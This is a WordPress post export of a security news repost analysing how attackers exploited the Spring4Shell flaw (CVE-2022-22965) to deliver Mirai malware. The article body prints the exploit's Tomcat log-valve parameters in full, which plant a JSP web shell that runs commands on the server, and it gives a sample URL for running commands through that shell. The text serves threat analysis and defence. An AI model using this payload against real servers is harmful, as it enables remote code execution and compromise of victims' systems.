{"id":46105,"date":"2022-04-08T00:00:00","date_gmt":"2022-04-08T00:00:00","guid":{"rendered":"urn:uuid:2e9f2a53-dfd0-6dca-43ae-afea87523aed"},"modified":"2022-04-08T00:00:00","modified_gmt":"2022-04-08T00:00:00","slug":"cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/","title":{"rendered":"CVE-2022-22965: Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/d\/spring4shell\/spring4shell-tb.jpg\"><\/p>\n<div><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/d\/spring4shell\/spring4shell-tb.jpg\" class=\"ff-og-image-inserted\"><\/div>\n<p>The payload from the first stage can be sent as a single request without using different headers as shown in Figure 4 and as described in this <a href=\"https:\/\/github.com\/jbaines-r7\/spring4shell_vulnapp\">public exploit<\/a>. This exploit proof of concept is also interesting since a legitimate Tomcat feature of formatting the incoming logs to a deployed application is exploited as described in the second stage.<\/p>\n<p><b>Stage 2<\/b><\/p>\n<p>After decoding the payload being used from the first stage, we observe the following parameters and values in the payload:<\/p>\n<p>class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i if(&#8220;j&#8221;.equals(request.getParameter(&#8220;pwd&#8221;))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter(&#8220;cmd&#8221;)).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i<\/p>\n<p>class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp<\/p>\n<p>class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps\/ROOT<\/p>\n<p>class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar<\/p>\n<p>class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=<\/p>\n<p>When a server handles this request, it creates a \u201ctomcatwar.jsp\u201d file on the server directory, which can be observed in the following string from the request made in the first stage.<\/p>\n<p>Here, five specific&nbsp;<a href=\"https:\/\/tomcat.apache.org\/tomcat-8.5-doc\/config\/valve.html\" title=\"attributes\">attributes<\/a>&nbsp;are modified as follows:<\/p>\n<p><i>1. Pattern:&nbsp;<\/i>It consists of a formatting layout identifying the various fields to extract from the request and log the response. Here you can see how the headers \u2018c2\u2019, \u2018c1\u2019, \u2018suffix\u2019 are being fetched from the headers. The substitution happens from the incoming headers as the format is %{name_of_header}i.<\/p>\n<p>class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i if(&#8220;j&#8221;.equals(request.getParameter(&#8220;pwd&#8221;))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter(&#8220;cmd&#8221;)).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i<\/p>\n<p><i>2. Suffix:&nbsp;<\/i>The suffix to add to the end of each log file name. The extension of the file that will be written is .jsp<\/p>\n<p>class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp<\/p>\n<p><i>3. Directory:&nbsp;<\/i>The absolute or relative path of a directory where the file will be created. In this case, \u2018webapps\/ROOT\u2019 is selected since this is the path that is contained in a default Tomcat installation.<\/p>\n<p>class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps\/ROOT<\/p>\n<p><i>4. Prefix:&nbsp;<\/i>The string that is added to the start of each log file that will be created. In this case, it\u2019s \u2018tomcatwar\u2019.<\/p>\n<p>class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar<\/p>\n<p><i>5. fileDateFormat:&nbsp;<\/i>The field allows for a customized timestamp to be added in the log file name. This is kept empty since we don\u2019t want any other extensions in the JSP webshell and this is set to empty because we don\u2019t desire the default timestamp format.<\/p>\n<p>class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=<\/p>\n<p><b>Stage 3<\/b><\/p>\n<p>Using the uploaded JSP web shell, malicious actors can execute commands on the server remotely, as observed in this domain:<\/p>\n<ul>\n<li>\u00b7&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(http:\/\/victimIP:8080\/tomcatwar[.]jsp?pwd=j&amp;cmd=whoami<u>)<\/u><\/li>\n<\/ul>\n<p> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/d\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>We discovered active exploitation of a vulnerability in the Spring Framework designated as CVE-2022-22965 that allows malicious actors to download the Mirai botnet malware. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":46106,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9555,9514,9509],"class_list":["post-46105","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-exploitsvulnerabilities","tag-trend-micro-research-iot","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>CVE-2022-22965: Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CVE-2022-22965: Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2022-04-08T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/d\/spring4shell\/spring4shell-tb.jpg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"CVE-2022-22965: Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware\",\"datePublished\":\"2022-04-08T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/\"},\"wordCount\":541,\"publisher\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/04\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware.jpg\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Exploits&amp;Vulnerabilities\",\"Trend Micro Research : IoT\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/\",\"url\":\"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/\",\"name\":\"CVE-2022-22965: Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/04\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware.jpg\",\"datePublished\":\"2022-04-08T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/#primaryimage\",\"url\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/04\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware.jpg\",\"contentUrl\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/04\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware.jpg\",\"width\":641,\"height\":350},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.threatshub.org\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"CVE-2022-22965: Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#website\",\"url\":\"https:\/\/www.threatshub.org\/blog\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\/\/www.threatshub.org\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"CVE-2022-22965: Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/","og_locale":"en_US","og_type":"article","og_title":"CVE-2022-22965: Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2022-04-08T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/d\/spring4shell\/spring4shell-tb.jpg","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"CVE-2022-22965: Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware","datePublished":"2022-04-08T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/"},"wordCount":541,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/04\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware.jpg","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Exploits&amp;Vulnerabilities","Trend Micro Research : IoT","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/","url":"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/","name":"CVE-2022-22965: Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/04\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware.jpg","datePublished":"2022-04-08T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/04\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/04\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware.jpg","width":641,"height":350},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulnerability-in-weaponizing-and-executing-the-mirai-botnet-malware\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"CVE-2022-22965: Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/46105","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=46105"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/46105\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/46106"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=46105"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=46105"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=46105"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}